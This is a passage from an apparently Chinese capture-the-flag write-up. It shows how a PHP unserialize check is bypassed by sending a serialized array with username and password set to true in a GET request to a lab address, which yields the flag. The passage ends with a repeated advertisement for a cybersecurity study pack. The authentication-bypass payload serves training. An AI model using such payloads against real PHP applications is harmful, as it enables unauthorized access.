发现data_unserialize = unserialize($info);这段代码使用了unserialize函数对输入的信息进行反序列化,那么我们先对像输入的内容进行序列化;
首先构建php文件:
具体内容如下所示:
<?php echo serialize(array( "username"=>true, "password"=>true, )); ?>
接下来再目录下输入cmd进入控制台,输入php test.php
输出序列化内容
a:2:{s:8:“username”;b:1;s:8:“password”;b:1;}
接下来访问172.17.0.34/?info=a:2:{s:8:“username”;b:1;s:8:“password”;b:1;}
(因为从代码中可以看出是对info进行GET)
找到了flag
flag为flag{who_is_flag_3001}
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!